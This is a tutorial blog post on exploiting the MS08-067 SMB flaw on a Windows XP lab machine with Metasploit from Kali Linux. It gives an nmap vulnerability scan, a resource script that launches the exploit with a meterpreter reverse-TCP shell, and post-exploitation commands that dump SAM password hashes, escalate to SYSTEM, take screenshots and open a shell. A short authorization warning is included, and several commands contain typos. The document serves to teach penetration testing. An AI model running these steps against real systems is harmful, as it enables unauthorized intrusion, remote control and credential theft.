exploit using resource script – metasploit

How to exploit using resource script ?

Metasploit framework, exploit using a resource script to set of instruction required to make an exploit attempt

Warning : don’t try this on any public, corporate or unauthorized networks . Performed only when you have authorization to do.

Exploit attempt using the Metasploit framework can be made using different approaches like: msfcli, msfconsole, shell scripting & resource scripting

With our guide we are going to use windows xp as our target (victim) and Kali Linux as the attacker.

We are going to create a resource script(.rc) file to make exploitation automated.

Lab – Setup(exploit using resource script)

Target(victim) :
OS in target : Windows XP
exploit : ms08-067
Port : 445

Attaker :
OS in attacker : Kali Linux
Exploit framework : Metasploit
Exploit method : msfcli

Start metasploit framework and postgresql services
#/etc/init.d/metasploit start
#/etc/inid.d/postgresql start

Check for knowing vulnerabilities in a target PC using the numb scripting engine.

In our attempt we are going check for smb vuln using nmap the very powerful tool.

Locate for .nse scripts to find out the exact location of namp scripts , and the file extension of the script “.nse”

#locate .nse

The default location of nmap scripting in Kali Linux: /usr/share/nmap/scripts/

Switch to /usr/share/nmap/scripts/, and list all the scripts
#cd /usr/share/nmap/scripts/

List out only smb*
#ls smb*

Check for vuln in remote PC by running below nmap command with a script.

#nmap –script=smb-check-vulns.nse –script-args=unsafe=1


Let’s start writing a resource script file .rc

#vi ms08-067.rc
use exploit/windows/smb/ms08_067_netapi # set exploit
set windows/meterpreter/reverse_tcp #set payload for reverse shell
set RHOST #set target(victim) IP address
set LHOST #set localIP(attaker)
set LPORT 4444 #set reverse shell binding port
set ExitOnSession false
exploit -j -z #push exploit in the background

Save & Exit!

Let’s run resource script
#msfconsole -r ms08-067.rc

Let’s list meterpreter sessions and associated ID’s
msf explit(ms08_067_netapi)>show sessions

Connect an meterpreter session
msf explit(ms08_067_netapi)>sessions -i 1

Once the meterpreter session established, proceed for post exploitation.

The help command to know the usage of command during the post exploitation, information gather or privilege escalation.

Run post exploitation commands to gather information about remote PC

meterpreter > help

Get the passwords from SAM database
meterpreter > hasdump

Privilege escalation to system account
meterpreter >getsystem

View network settings
meterpreter >ipconfig

System information
meterpreter >sysinfo

Capture screen shot of remote PC(victim’s), stores it in current working directory.
meterpreter >screenshot

Get into the shell of target PC,execute mkdir , rm , copy & any command .
meterpreter >shell


Watch , How to exploit using resource script

Both comments and pings are currently closed.

Comments are closed.

Copyright ©Solutions@Experts.com
Copyright © NewWpThemes Techmark Solutions - www.techmarksolutions.co.uk